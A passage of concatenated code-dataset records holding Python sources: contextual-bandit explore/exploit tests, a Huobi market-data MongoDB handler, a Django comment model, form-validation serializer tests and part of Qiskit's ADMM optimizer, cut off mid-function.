0.90)\n assert_array_equal(\n cacb_2.logged_data,\n np.array(\n [\n np.array([0.75, 100, 0, 1, 0, 0, 0, 0, 1, 2, 3]),\n np.array([0.90, 90, 1, 0, 0, 0, 0, 0, 1, 2, 3]),\n ]\n ),\n )\n\n def test_exploit(self):\n cacb = ContinuousActionContextualBanditModel(\n min_value=10,\n max_value=15,\n action_width=1,\n )\n\n # lowest cost exists\n costs_per_action = {\n 10.0: 100.0,\n 11.0: 100.0,\n 12.0: 90.0,\n 13.0: 100.0,\n 14.0: 100.0,\n 15.0: 100.0,\n }\n epsilon = 0.10\n action, prob = cacb._exploit(costs_per_action, epsilon)\n self.assertEqual(action, 12.0)\n self.assertEqual(prob, 0.90)\n\n # no clear winner => should choose the first of the best\n costs_per_action = {\n 10.0: 100.0,\n 11.0: 90.0,\n 12.0: 100.0,\n 13.0: 90.0,\n 14.0: 90.0,\n 15.0: 100.0,\n }\n epsilon = 0.10\n action, prob = cacb._exploit(costs_per_action, epsilon)\n self.assertEqual(action, 11.0)\n self.assertEqual(prob, 0.90)\n\n def test_explore(self):\n cacb = ContinuousActionContextualBanditModel(\n min_value=10,\n max_value=15,\n action_width=1,\n )\n # the best action is 12\n costs_per_action = {\n 10.0: 100.0,\n 11.0: 100.0,\n 12.0: 90.0,\n 13.0: 100.0,\n 14.0: 100.0,\n 15.0: 100.0,\n }\n\n # exploration width = 1\n epsilon = 0.10\n exploration_width = 1\n action, prob = cacb._explore(costs_per_action, epsilon, exploration_width)\n 
self.assertEqual(prob, 0.05)\n self.assertIn(action, [11, 13])\n\n # exploration direction = left\n epsilon = 0.10\n exploration_width = 1\n direction = \"left\"\n action, prob = cacb._explore(\n costs_per_action, epsilon, exploration_width, direction\n )\n self.assertEqual(prob, 0.10)\n self.assertEqual(action, 11)\n\n # exploration width = 2\n epsilon = 0.10\n exploration_width = 2\n action, prob = cacb._explore(costs_per_action, epsilon, exploration_width)\n self.assertEqual(prob, 0.025)\n self.assertIn(action, [10, 11, 13, 14])\n\n # exploration width = 1, optimum in the end\n costs_per_action = {\n 10.0: 90.0,\n 11.0: 100.0,\n 12.0: 100.0,\n 13.0: 100.0,\n 14.0: 100.0,\n 15.0: 100.0,\n }\n epsilon = 0.10\n exploration_width = 1\n action, prob = cacb._explore(costs_per_action, epsilon, exploration_width)\n self.assertEqual(prob, 0.10)\n self.assertEqual(action, 11)\n\n # exploration width = 1, optimum in the left end, left direction\n costs_per_action = {\n 10.0: 90.0,\n 11.0: 100.0,\n 12.0: 100.0,\n 13.0: 100.0,\n 14.0: 100.0,\n 15.0: 100.0,\n }\n epsilon = 0.10\n exploration_width = 1\n action, prob = cacb._explore(\n costs_per_action, epsilon, exploration_width, direction=\"left\"\n )\n self.assertEqual(prob, 0.10)\n self.assertEqual(action, 10)\n\n def test_existing_data(self):\n cacb = ContinuousActionContextualBanditModel(\n min_value=10,\n max_value=15,\n action_width=1,\n data_file=mock_file,\n )\n self.assertEqual(cacb.logged_data.shape[0], 5)\n cacb.learn(np.array([0, 0, 1]), 0, 100, 0.90)\n log_file_data = pd.read_csv(mock_file, header=None).values # type: ignore\n self.assertEqual(log_file_data.shape[0], 6)\n\n def test_existing_data_and_memory(self):\n cacb = ContinuousActionContextualBanditModel(\n min_value=10, max_value=15, action_width=1, data_file=mock_file, memory=10\n )\n self.assertEqual(cacb.logged_data.shape[0], 5)\n\n cacb = ContinuousActionContextualBanditModel(\n min_value=10, max_value=15, action_width=1, data_file=mock_file, memory=3\n )\n self.assertEqual(cacb.logged_data.shape[0], 3)\n self.assertListEqual(list(cacb.logged_data[-1]), [0.0333, 120, 4, 1, 1, 0])\n cacb._log_example(np.array([0, 1, 1]), 1, 105, 0.0333)\n self.assertEqual(cacb.logged_data.shape[0], 3)\n self.assertListEqual(list(cacb.logged_data[-1]), [0.0333, 105, 1, 0, 1, 1])\n\n def test_get_previous_move(self):\n cacb = ContinuousActionContextualBanditModel(\n min_value=10,\n max_value=15,\n action_width=1,\n data_file=mock_file,\n )\n self.assertEqual(cacb._get_previous_move(0.1), (True, 10.0, 2.0))\n\n def tearDown(self):\n os.remove(mock_file)\n","sub_path":"tests/test_cacb.py","file_name":"test_cacb.py","file_ext":"py","file_size_in_byte":7527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
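The exploration tests above pin down an epsilon-greedy rule over a discretized action grid: the lowest-cost action is played with probability 1 − ε, and ε is split evenly across the in-range neighbors. A toy re-implementation of just that selection rule (illustrative, not the library's internals):

```python
import numpy as np

rng = np.random.default_rng(123)

def choose(costs_per_action, epsilon=0.10, width=1):
    # exploit: the lowest-cost action; explore: a neighbor within `width`
    actions = sorted(costs_per_action)
    best = min(actions, key=costs_per_action.get)
    i = actions.index(best)
    neighbors = actions[max(0, i - width):i] + actions[i + 1:i + 1 + width]
    if neighbors and rng.random() < epsilon:
        return rng.choice(neighbors), epsilon / len(neighbors)
    return best, 1 - epsilon

costs = {10.0: 100.0, 11.0: 100.0, 12.0: 90.0, 13.0: 100.0, 14.0: 100.0}
print(choose(costs))  # usually (12.0, 0.9); sometimes (11.0, 0.05) or (13.0, 0.05)
```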
+{"seq_id":"117081630","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/5/25 0025 14:52\n# @Author : Hadrianl \n# @File : handler.py\n# @Contact : 137150224@qq.com\n\nimport pymongo as pmo\nfrom .utils import logger, handler_profiler\nfrom threading import Thread\nfrom queue import Queue,Empty\nfrom abc import abstractmethod\n\nclass baseHandler():\n def __init__(self, name, topic: (str, list)=None):\n self.name = name\n self.topic = set(topic if isinstance(topic, list) else [topic]) if topic !=None else set()\n self.thread = Thread(name=self.name)\n self.queue = Queue()\n\n def run(self):\n while True:\n try:\n msg = self.queue.get(timeout=5)\n if msg == None: # 向队列传入None来作为结束信号\n break\n\n if self.topic == set():\n self.handle(msg)\n else:\n topic = msg.get('ch') or msg.get('rep')\n print(topic)\n if topic and topic in self.topic:\n self.handle(msg)\n except Empty:\n ...\n except Exception as e:\n logger.exception(f'-{self.name} exception:{e}')\n\n def add_topic(self, new_topic):\n self.topic.add(new_topic)\n\n def remove_topic(self, topic):\n self.topic.remove(topic)\n\n def stop(self):\n self.queue.put(None)\n self.thread.join()\n self.queue = Queue()\n\n def start(self):\n self.thread = Thread(target=self.run, name=self.name)\n self.thread.setDaemon(True)\n self.thread.start()\n\n @abstractmethod\n def handle(self, msg): # 所有handler需要重写这个函数\n ...\n\n def __call__(self, msg):\n if self.thread.is_alive():\n self.queue.put(msg)\n\n\nclass DBHandler(baseHandler, pmo.MongoClient):\n def __init__(self, topic=None, host='localhost', port=27017, db='HuoBi'):\n baseHandler.__init__(self, 'DB', topic)\n pmo.MongoClient.__init__(self, host, port)\n self.db = self.get_database(db)\n\n def into_db(self, data, topic:str):\n collection = self.db.get_collection(topic)\n try:\n if 'kline' in topic:\n if isinstance(data, dict):\n collection.update({'id': data['id']}, data, upsert=True)\n elif isinstance(data, list):\n for d in data:\n collection.update({'id': d['id']}, d, upsert=True)\n elif 'trade.detail' in topic:\n for d in data:\n collection.update({'id': d['id']}, d, upsert=True)\n except Exception as e:\n logger.error(f'<数据>插入数据库错误-{e}')\n\n @handler_profiler\n def handle(self, msg):\n if 'ch' in msg or 'rep' in msg:\n topic = msg.get('ch') or msg.get('rep')\n data = msg.get('tick') or msg.get('data')\n self.into_db(data, topic)\n\n\n","sub_path":"huobitrade/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"165539954","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom post.models import Post\nfrom django.utils import timezone\nimport datetime\n# Create your models here.\n\n\nclass Comment(models.Model):\n body = models.TextField(max_length=2000)\n author = models.ForeignKey(User, blank=True)\n post = models.ForeignKey(Post)\n enable = models.BooleanField(default=True)\n pub_date = models.DateTimeField(auto_now_add=True)\n patch_date = models.DateTimeField(default=timezone.now())\n likes = models.ManyToManyField(\n User,\n related_name='comment_likes',\n blank=True,\n editable=False\n )\n image = models.ImageField(\n upload_to='comment/%s' % (timezone.now().strftime('%y%m%d')),\n blank=True,\n null=True\n )\n\n def was_published_recently(self):\n now = timezone.now()\n return now - datetime.timedelta(minutes=30) <= self.pub_date <= now\n\n def count_likes(self):\n return self.likes.count()\n\n def __unicode__(self):\n return \"Comment to %s\" % self.post\n","sub_path":"comment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"114794610","text":"# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\n\nfrom formidable.models import Formidable\nfrom formidable.serializers.validation import (\n MinLengthSerializer, RegexpSerializer,\n ValidationSerializer\n)\n\n\nclass ValidationSerializerTest(TestCase):\n\n def setUp(self):\n super(ValidationSerializerTest, self).setUp()\n self.form = Formidable.objects.create(\n label=u'test', description=u'test'\n )\n self.text = self.form.fields.create(\n type_id=u'text', slug=u'input-text', label=u'name',\n )\n\n def test_int_value(self):\n data = {'field_id': self.text.id, 'value': 5, 'type': 'minlength'}\n serializer = MinLengthSerializer(data=data)\n self.assertTrue(serializer.is_valid())\n\n def test_non_int_value(self):\n data = {'field_id': self.text.id, 'value': 'test', 'type': 'minlength'}\n serializer = MinLengthSerializer(data=data)\n self.assertFalse(serializer.is_valid())\n\n def test_regexp_value(self):\n data = {\n 'field_id': self.text.id, 'value': u'\\w+ly', 'type': 'minlength'\n }\n serializer = RegexpSerializer(data=data)\n self.assertTrue(serializer.is_valid())\n\n def test_invalid_regexp_value(self):\n data = {\n 'field_id': self.text.id, 'value': u'\\w+ly(', 'type': 'minlength'\n }\n serializer = RegexpSerializer(data=data)\n self.assertFalse(serializer.is_valid())\n\n def test_update_validations(self):\n list_serializer = ValidationSerializer(many=True)\n self.text.validations.create(\n value=u'5', type=u'minlength'\n )\n list_serializer.update(\n self.text.validations,\n [{'type': 'minlength', 'value': '12'}],\n self.text\n )\n self.assertEquals(self.text.validations.count(), 1)\n validation = self.text.validations.first()\n self.assertEquals(validation.value, '12')\n","sub_path":"demo/tests/serializers/tests_validations.py","file_name":"tests_validations.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"555844544","text":"# -*- coding: utf-8 -*-\n\n# This code is part of Qiskit.\n#\n# (C) Copyright IBM 2020.\n#\n# This code is licensed under the Apache License, Version 2.0. You may\n# obtain a copy of this license in the LICENSE.txt file in the root directory\n# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.\n#\n# Any modifications or derivative works of this code must retain this\n# copyright notice, and modified files need to carry a notice indicating\n# that they have been altered from the originals.\n\n\"\"\"An implementation of the ADMM algorithm.\"\"\"\nimport logging\nimport time\nfrom typing import List, Optional, Any\n\nimport numpy as np\nfrom cplex import SparsePair\nfrom qiskit.optimization.algorithms.cplex_optimizer import CplexOptimizer\nfrom qiskit.optimization.algorithms.optimization_algorithm import OptimizationAlgorithm\nfrom qiskit.optimization.problems.optimization_problem import OptimizationProblem\nfrom qiskit.optimization.problems.variables import CPX_BINARY, CPX_CONTINUOUS\nfrom qiskit.optimization.results.optimization_result import OptimizationResult\n\n\nUPDATE_RHO_BY_TEN_PERCENT = 0\nUPDATE_RHO_BY_RESIDUALS = 1\n\n\nclass ADMMParameters:\n \"\"\"Defines a set of parameters for ADMM optimizer.\"\"\"\n\n def __init__(self, rho_initial: float = 10000, factor_c: float = 100000, beta: float = 1000,\n max_iter: int = 10, tol: float = 1.e-4, max_time: float = np.inf,\n three_block: bool = True, vary_rho: int = UPDATE_RHO_BY_TEN_PERCENT,\n tau_incr: float = 2, tau_decr: float = 2, mu_res: float = 10,\n mu_merit: float = 1000) -> None:\n \"\"\"Defines parameters for ADMM optimizer and their default values.\n\n Args:\n rho_initial: Initial value of rho parameter of ADMM.\n factor_c: Penalizing factor for equality constraints, when mapping to QUBO.\n beta: Penalization for y decision variables.\n max_iter: Maximum number of iterations for ADMM.\n tol: Tolerance for the residual convergence.\n max_time: Maximum running time (in seconds) for ADMM.\n three_block: Boolean flag to select the 3-block ADMM implementation.\n vary_rho: Flag to select the rule to update rho.\n If set to 0, then rho increases by 10% at each iteration.\n If set to 1, then rho is modified according to primal and dual residuals.\n tau_incr: Parameter used in the rho update (UPDATE_RHO_BY_RESIDUALS).\n The update rule can be found in:\n Boyd, S., Parikh, N., Chu, E., Peleato, B., & Eckstein, J. (2011).\n Distributed optimization and statistical learning via the alternating\n direction method of multipliers.\n Foundations and Trends® in Machine learning, 3(1), 1-122.\n tau_decr: Parameter used in the rho update (UPDATE_RHO_BY_RESIDUALS).\n mu_res: Parameter used in the rho update (UPDATE_RHO_BY_RESIDUALS).\n mu_merit: Penalization for constraint residual. Used to compute the merit values.\n \"\"\"\n super().__init__()\n self.mu_merit = mu_merit\n self.mu_res = mu_res\n self.tau_decr = tau_decr\n self.tau_incr = tau_incr\n self.vary_rho = vary_rho\n self.three_block = three_block\n self.max_time = max_time\n self.tol = tol\n self.max_iter = max_iter\n self.factor_c = factor_c\n self.beta = beta\n self.rho_initial = rho_initial\n\n\nclass ADMMState:\n \"\"\"Internal computation state of the ADMM implementation.\n\n The state keeps track of various variables are stored that are being updated during problem\n solving. The values are relevant to the problem being solved. The state is recreated for each\n optimization problem. 
State is returned as the third value.\n \"\"\"\n\n def __init__(self,\n op: OptimizationProblem,\n binary_indices: List[int],\n continuous_indices: List[int],\n rho_initial: float) -> None:\n \"\"\"Constructs an internal computation state of the ADMM implementation.\n\n Args:\n op: The optimization problem being solved.\n binary_indices: Indices of the binary decision variables of the original problem.\n continuous_indices: Indices of the continuous decision variables of the original\n problem.\n rho_initial: Initial value of the rho parameter.\n \"\"\"\n super().__init__()\n\n # Optimization problem itself\n self.op = op\n # Indices of the variables\n self.binary_indices = binary_indices\n self.continuous_indices = continuous_indices\n self.sense = op.objective.get_sense()\n\n # define heavily used matrix, they are used at each iteration, so let's cache them,\n # they are np.ndarrays\n # pylint:disable=invalid-name\n # objective\n self.q0 = None\n self.c0 = None\n self.q1 = None\n self.c1 = None\n # constraints\n self.a0 = None\n self.b0 = None\n self.a1 = None\n self.b1 = None\n self.a2 = None\n self.a3 = None\n self.b2 = None\n self.a4 = None\n self.b3 = None\n\n # These are the parameters that are updated in the ADMM iterations.\n self.u: np.ndarray = np.zeros(len(continuous_indices))\n binary_size = len(binary_indices)\n self.x0: np.ndarray = np.zeros(binary_size)\n self.z: np.ndarray = np.zeros(binary_size)\n self.z_init: np.ndarray = self.z\n self.y: np.ndarray = np.zeros(binary_size)\n self.lambda_mult: np.ndarray = np.zeros(binary_size)\n\n # The following structures store quantities obtained in each ADMM iteration.\n self.cost_iterates = []\n self.residuals = []\n self.dual_residuals = []\n self.cons_r = []\n self.merits = []\n self.lambdas = []\n self.x0_saved = []\n self.u_saved = []\n self.z_saved = []\n self.y_saved = []\n self.rho = rho_initial\n\n\nclass ADMMOptimizerResult(OptimizationResult):\n \"\"\" ADMMOptimizer Result.\"\"\"\n\n def __init__(self, x: Optional[Any] = None, fval: Optional[Any] = None,\n state: Optional[ADMMState] = None) -> None:\n super().__init__(x, fval, state)\n self._state = state\n\n @property\n def state(self) -> Optional[ADMMState]:\n \"\"\" returns state \"\"\"\n return self._state\n\n\nclass ADMMOptimizer(OptimizationAlgorithm):\n \"\"\"An implementation of the ADMM-based heuristic introduced here:\n Gambella, C., & Simonetto, A. 
(2020).\n Multi-block ADMM Heuristics for Mixed-Binary Optimization on Classical and Quantum Computers.\n arXiv preprint arXiv:2001.02069.\n \"\"\"\n\n def __init__(self, qubo_optimizer: Optional[OptimizationAlgorithm] = None,\n continuous_optimizer: Optional[OptimizationAlgorithm] = None,\n params: Optional[ADMMParameters] = None) -> None:\n \"\"\"Constructs an instance of ADMMOptimizer.\n\n Args:\n qubo_optimizer: An instance of OptimizationAlgorithm that can effectively solve\n QUBO problems.\n continuous_optimizer: An instance of OptimizationAlgorithm that can solve\n continuous problems.\n params: An instance of ADMMParameters.\n \"\"\"\n\n super().__init__()\n self._log = logging.getLogger(__name__)\n\n # create default params if not present\n self._params = params or ADMMParameters()\n\n # create optimizers if not specified\n self._qubo_optimizer = qubo_optimizer or CplexOptimizer()\n self._continuous_optimizer = continuous_optimizer or CplexOptimizer()\n\n # internal state where we'll keep intermediate solution\n # here, we just declare the class variable, the variable is initialized in kept in\n # the solve method.\n self._state: Optional[ADMMState] = None\n\n def is_compatible(self, problem: OptimizationProblem) -> Optional[str]:\n \"\"\"Checks whether a given problem can be solved with the optimizer implementing this method.\n\n Args:\n problem: The optimization problem to check compatibility.\n\n Returns:\n Returns ``None`` if the problem is compatible and else a string with the error message.\n \"\"\"\n\n # 1. only binary and continuous variables are supported\n for var_type in problem.variables.get_types():\n if var_type not in (CPX_BINARY, CPX_CONTINUOUS):\n # variable is not binary and not continuous.\n return \"Only binary and continuous variables are supported\"\n\n binary_indices = self._get_variable_indices(problem, CPX_BINARY)\n continuous_indices = self._get_variable_indices(problem, CPX_CONTINUOUS)\n\n # 2. binary and continuous variables are separable in objective\n for binary_index in binary_indices:\n for continuous_index in continuous_indices:\n coeff = problem.objective.get_quadratic_coefficients(binary_index, continuous_index)\n if coeff != 0:\n # binary and continuous vars are mixed.\n return \"Binary and continuous variables are not separable in the objective\"\n\n # 3. 
no quadratic constraints are supported.\n quad_constraints = problem.quadratic_constraints.get_num()\n if quad_constraints is not None and quad_constraints > 0:\n # quadratic constraints are not supported.\n return \"Quadratic constraints are not supported\"\n\n return None\n\n def solve(self, problem: OptimizationProblem) -> ADMMOptimizerResult:\n \"\"\"Tries to solves the given problem using ADMM algorithm.\n\n Args:\n problem: The problem to be solved.\n\n Returns:\n The result of the optimizer applied to the problem.\n\n Raises:\n QiskitOptimizationError: If the problem is incompatible with the optimizer.\n \"\"\"\n # parse problem and convert to an ADMM specific representation.\n binary_indices = self._get_variable_indices(problem, CPX_BINARY)\n continuous_indices = self._get_variable_indices(problem, CPX_CONTINUOUS)\n\n # create our computation state.\n self._state = ADMMState(problem, binary_indices,\n continuous_indices, self._params.rho_initial)\n\n # convert optimization problem to a set of matrices and vector that are used\n # at each iteration.\n self._convert_problem_representation()\n\n start_time = time.time()\n # we have not stated our computations yet, so elapsed time initialized as zero.\n elapsed_time = 0\n iteration = 0\n residual = 1.e+2\n\n while (iteration < self._params.max_iter and residual > self._params.tol) \\\n and (elapsed_time < self._params.max_time):\n if binary_indices:\n op1 = self._create_step1_problem()\n self._state.x0 = self._update_x0(op1)\n # else, no binary variables exist,\n # and no update to be done in this case.\n # debug\n self._log.debug(\"x0=%s\", self._state.x0)\n\n op2 = self._create_step2_problem()\n self._state.u, self._state.z = self._update_x1(op2)\n # debug\n self._log.debug(\"u=%s\", self._state.u)\n self._log.debug(\"z=%s\", self._state.z)\n\n if self._params.three_block:\n if binary_indices:\n op3 = self._create_step3_problem()\n self._state.y = self._update_y(op3)\n # debug\n self._log.debug(\"y=%s\", self._state.y)\n\n lambda_mult = self._update_lambda_mult()\n\n cost_iterate = self._get_objective_value()\n constraint_residual = self._get_constraint_residual()\n residual, dual_residual = self._get_solution_residuals(iteration)\n merit = self._get_merit(cost_iterate, constraint_residual)\n # debug\n self._log.debug(\"cost_iterate=%s, cr=%s, merit=%s\",\n cost_iterate, constraint_residual, merit)\n\n # costs and merits are saved with their original sign.\n self._state.cost_iterates.append(self._state.sense * cost_iterate)\n self._state.residuals.append(residual)\n self._state.dual_residuals.append(dual_residual)\n self._state.cons_r.append(constraint_residual)\n self._state.merits.append(merit)\n self._state.lambdas.append(np.linalg.norm(lambda_mult))\n\n self._state.x0_saved.append(self._state.x0)\n self._state.u_saved.append(self._state.u)\n self._state.z_saved.append(self._state.z)\n self._state.z_saved.append(self._state.y)\n\n self._update_rho(residual, dual_residual)\n\n iteration += 1\n elapsed_time = time.time() - start_time\n\n solution, objective_value = self._get_best_merit_solution()\n solution = self._revert_solution_indexes(solution)\n\n # third parameter is our internal state of computations.\n result = ADMMOptimizerResult(solution, objective_value, self._state)\n # debug\n self._log.debug(\"solution=%s, objective=%s at iteration=%s\",\n solution, objective_value, iteration)\n return result\n\n @staticmethod\n def _get_variable_indices(op: OptimizationProblem, var_type: str) -> List[int]:\n \"\"\"Returns a list of 
indices of the variables of the specified type.\n\n Args:\n op: Optimization problem.\n var_type: type of variables to look for.\n\n Returns:\n List of indices.\n \"\"\"\n indices = []\n for i, variable_type in enumerate(op.variables.get_types()):\n if variable_type == var_type:\n indices.append(i)\n\n return indices\n\n def _revert_solution_indexes(self, internal_solution: List[np.ndarray]) \\\n -> np.ndarray:\n \"\"\"Constructs a solution array where variables are stored in the correct order.\n\n Args:\n internal_solution: a list with two lists: solutions for binary variables and\n for continuous variables.\n\n Returns:\n A solution array.\n \"\"\"\n binary_solutions, continuous_solutions = internal_solution\n solution = np.zeros(len(self._state.binary_indices) + len(self._state.continuous_indices))\n # restore solution at the original index location\n for i, binary_index in enumerate(self._state.binary_indices):\n solution[binary_index] = binary_solutions[i]\n for i, continuous_index in enumerate(self._state.continuous_indices):\n solution[continuous_index] = continuous_solutions[i]\n return solution\n\n def _convert_problem_representation(self) -> None:\n \"\"\"Converts problem representation into set of matrices and vectors.\n Specifically, the optimization problem is represented as:\n\n min_{x0, u} x0^T q0 x0 + c0^T x0 + u^T q1 u + c1^T u\n\n s.t. a0 x0 = b0\n a1 x0 <= b1\n a2 z + a3 u <= b2\n a4 u <= b3\n\n \"\"\"\n # objective\n self._state.q0 = self._get_q(self._state.binary_indices)\n self._state.c0 = self._get_c(self._state.binary_indices)\n self._state.q1 = self._get_q(self._state.continuous_indices)\n self._state.c1 = self._get_c(self._state.continuous_indices)\n # constraints\n self._state.a0, self._state.b0 = self._get_a0_b0()\n self._state.a1, self._state.b1 = self._get_a1_b1()\n self._state.a2, self._state.a3, self._state.b2 = self._get_a2_a3_b2()\n self._state.a4, self._state.b3 = self._get_a4_b3()\n\n def _get_q(self, variable_indices: List[int]) -> np.ndarray:\n \"\"\"Constructs a quadratic matrix for the variables with the specified indices\n from the quadratic terms in the objective.\n\n Args:\n variable_indices: variable indices to look for.\n\n Returns:\n A matrix as a numpy array of the shape(len(variable_indices), len(variable_indices)).\n \"\"\"\n size = len(variable_indices)\n q = np.zeros(shape=(size, size))\n # fill in the matrix\n # in fact we use re-indexed variables\n for i, var_index_i in enumerate(variable_indices):\n for j, var_index_j in enumerate(variable_indices):\n q[i, j] = self._state.op.objective.get_quadratic_coefficients(\n var_index_i,\n var_index_j)\n\n # flip the sign, according to the optimization sense, e.g. sense == 1 if minimize,\n # sense == -1 if maximize.\n return q * self._state.sense\n\n def _get_c(self, variable_indices: List[int]) -> np.ndarray:\n \"\"\"Constructs a vector for the variables with the specified indices from the linear terms\n in the objective.\n\n Args:\n variable_indices: variable indices to look for.\n\n Returns:\n A numpy array of the shape(len(variable_indices)).\n \"\"\"\n c = np.array(self._state.op.objective.get_linear(variable_indices))\n # flip the sign, according to the optimization sense, e.g. 
sense == 1 if minimize,\n # sense == -1 if maximize.\n c *= self._state.sense\n return c\n\n def _assign_row_values(self, matrix: List[List[float]], vector: List[float],\n constraint_index: int, variable_indices: List[int]):\n \"\"\"Appends a row to the specified matrix and vector based on the constraint specified by\n the index using specified variables.\n\n Args:\n matrix: a matrix to extend.\n vector: a vector to expand.\n constraint_index: constraint index to look for.\n variable_indices: variables to look for.\n\n Returns:\n None\n \"\"\"\n # assign matrix row.\n row = []\n for var_index in variable_indices:\n row.append(self._state.op\n .linear_constraints.get_coefficients(constraint_index, var_index))\n matrix.append(row)\n\n # assign vector row.\n vector.append(self._state.op.linear_constraints.get_rhs(constraint_index))\n\n # flip the sign if constraint is G, we want L constraints.\n if self._state.op.linear_constraints.get_senses(constraint_index) == \"G\":\n # invert the sign to make constraint \"L\".\n matrix[-1] = [-1 * el for el in matrix[-1]]\n vector[-1] = -1 * vector[-1]\n\n @staticmethod\n def _create_ndarrays(matrix: List[List[float]], vector: List[float], size: int) \\\n -> (np.ndarray, np.ndarray):\n \"\"\"Converts representation of a matrix and a vector in form of lists to numpy array.\n\n Args:\n matrix: matrix to convert.\n vector: vector to convert.\n size: size to create matrix and vector.\n\n Returns:\n Converted matrix and vector as numpy arrays.\n \"\"\"\n # if we don't have such constraints, return just dummy arrays.\n if len(matrix) != 0:\n return np.array(matrix), np.array(vector)\n else:\n return np.array([0] * size).reshape((1, -1)), np.zeros(shape=(1,))\n\n def _get_a0_b0(self) -> (np.ndarray, np.ndarray):\n \"\"\"Constructs a matrix and a vector from the constraints in a form of Ax = b, where\n x is a vector of binary variables.\n\n Returns:\n Corresponding matrix and vector as numpy arrays.\n\n Raises:\n ValueError: if the problem is not suitable for this optimizer.\n \"\"\"\n matrix = []\n vector = []\n\n senses = self._state.op.linear_constraints.get_senses()\n index_set = set(self._state.binary_indices)\n for constraint_index, sense in enumerate(senses):\n # we check only equality constraints here.\n if sense != \"E\":\n continue\n row = self._state.op.linear_constraints.get_rows(constraint_index)\n if set(row.ind).issubset(index_set):\n self._assign_row_values(matrix, vector,\n constraint_index, self._state.binary_indices)\n else:\n raise ValueError(\n \"Linear constraint with the 'E' sense must contain only binary variables, \"\n \"row indices: {}, binary variable indices: {}\"\n .format(row, self._state.binary_indices))\n\n return self._create_ndarrays(matrix, vector, len(self._state.binary_indices))\n\n def _get_inequality_matrix_and_vector(self, variable_indices: List[int]) \\\n -> (List[List[float]], List[float]):\n \"\"\"Constructs a matrix and a vector from the constraints in a form of Ax <= b, where\n x is a vector of variables specified by the indices.\n\n Args:\n variable_indices: variable indices to look for.\n\n Returns:\n A list based representation of the matrix and the vector.\n \"\"\"\n matrix = []\n vector = []\n senses = self._state.op.linear_constraints.get_senses()\n\n index_set = set(variable_indices)\n for constraint_index, sense in enumerate(senses):\n if sense in (\"E\", \"R\"):\n # TODO: Ranged constraints should be supported\n continue\n # sense either G or L.\n row = 
self._state.op.linear_constraints.get_rows(constraint_index)\n if set(row.ind).issubset(index_set):\n self._assign_row_values(matrix, vector, constraint_index, variable_indices)\n\n return matrix, vector\n\n def _get_a1_b1(self) -> (np.ndarray, np.ndarray):\n \"\"\"Constructs a matrix and a vector from the constraints in a form of Ax <= b, where\n x is a vector of binary variables.\n\n Returns:\n A numpy based representation of the matrix and the vector.\n \"\"\"\n matrix, vector = self._get_inequality_matrix_and_vector(self._state.binary_indices)\n return self._create_ndarrays(matrix, vector, len(self._state.binary_indices))\n\n def _get_a4_b3(self) -> (np.ndarray, np.ndarray):\n \"\"\"Constructs a matrix and a vector from the constraints in a form of Au <= b, where\n u is a vector of continuous variables.\n\n Returns:\n A numpy based representation of the matrix and the vector.\n \"\"\"\n matrix, vector = self._get_inequality_matrix_and_vector(self._state.continuous_indices)\n return self._create_ndarrays(matrix, vector, len(self._state.continuous_indices))\n\n def _get_a2_a3_b2(self) -> (np.ndarray, np.ndarray, np.ndarray):\n \"\"\"Constructs matrices and a vector from the constraints in a form of A_2x + A_3u <= b,\n where x is a vector of binary variables and u is a vector of continuous variables.\n\n Returns:\n A numpy representation of two matrices and one vector.\n \"\"\"\n matrix = []\n vector = []\n senses = self._state.op.linear_constraints.get_senses()\n\n binary_index_set = set(self._state.binary_indices)\n continuous_index_set = set(self._state.continuous_indices)\n all_variables = self._state.binary_indices + self._state.continuous_indices\n for constraint_index, sense in enumerate(senses):\n if sense in (\"E\", \"R\"):\n # TODO: Ranged constraints should be supported as well\n continue\n # sense either G or L.\n row = self._state.op.linear_constraints.get_rows(constraint_index)\n row_indices = set(row.ind)\n # we must have a least one binary and one continuous variable,\n # otherwise it is another type of constraints.\n if len(row_indices & binary_index_set) != 0 and len(\n row_indices & continuous_index_set) != 0:\n self._assign_row_values(matrix, vector, constraint_index, all_variables)\n\n # pylint:disable=invalid-name\n matrix, b2 = self._create_ndarrays(matrix, vector, len(all_variables))\n # a2\n a2 = matrix[:, 0:len(self._state.binary_indices)]\n a3 = matrix[:, len(self._state.binary_indices):]\n return a2, a3, b2\n\n def _create_step1_problem(self) -> OptimizationProblem:\n \"\"\"Creates a step 1 sub-problem.\n\n Returns:\n A newly created optimization problem.\n \"\"\"\n op1 = OptimizationProblem()\n\n binary_size = len(self._state.binary_indices)\n # create the same binary variables.\n op1.variables.add(names=[\"x0_\" + str(i + 1) for i in range(binary_size)],\n types=[\"I\"] * binary_size,\n lb=[0.] * binary_size,\n ub=[1.] 
* binary_size)\n\n # prepare and set quadratic objective.\n # NOTE: The multiplication by 2 is needed for the solvers to parse\n # the quadratic coefficients.\n quadratic_objective = 2 * (\n self._state.q0 +\n self._params.factor_c / 2 * np.dot(self._state.a0.transpose(), self._state.a0) +\n self._state.rho / 2 * np.eye(binary_size)\n )\n for i in range(binary_size):\n for j in range(i, binary_size):\n op1.objective.set_quadratic_coefficients(i, j, quadratic_objective[i, j])\n\n # prepare and set linear objective.\n linear_objective = self._state.c0 - \\\n self._params.factor_c * np.dot(self._state.b0, self._state.a0) + \\\n self._state.rho * (self._state.y - self._state.z)\n\n for i in range(binary_size):\n op1.objective.set_linear(i, linear_objective[i])\n return op1\n\n def _create_step2_problem(self) -> OptimizationProblem:\n \"\"\"Creates a step 2 sub-problem.\n\n Returns:\n A newly created optimization problem.\n \"\"\"\n op2 = OptimizationProblem()\n\n continuous_size = len(self._state.continuous_indices)\n binary_size = len(self._state.binary_indices)\n lower_bounds = self._state.op.variables.get_lower_bounds(self._state.continuous_indices)\n upper_bounds = 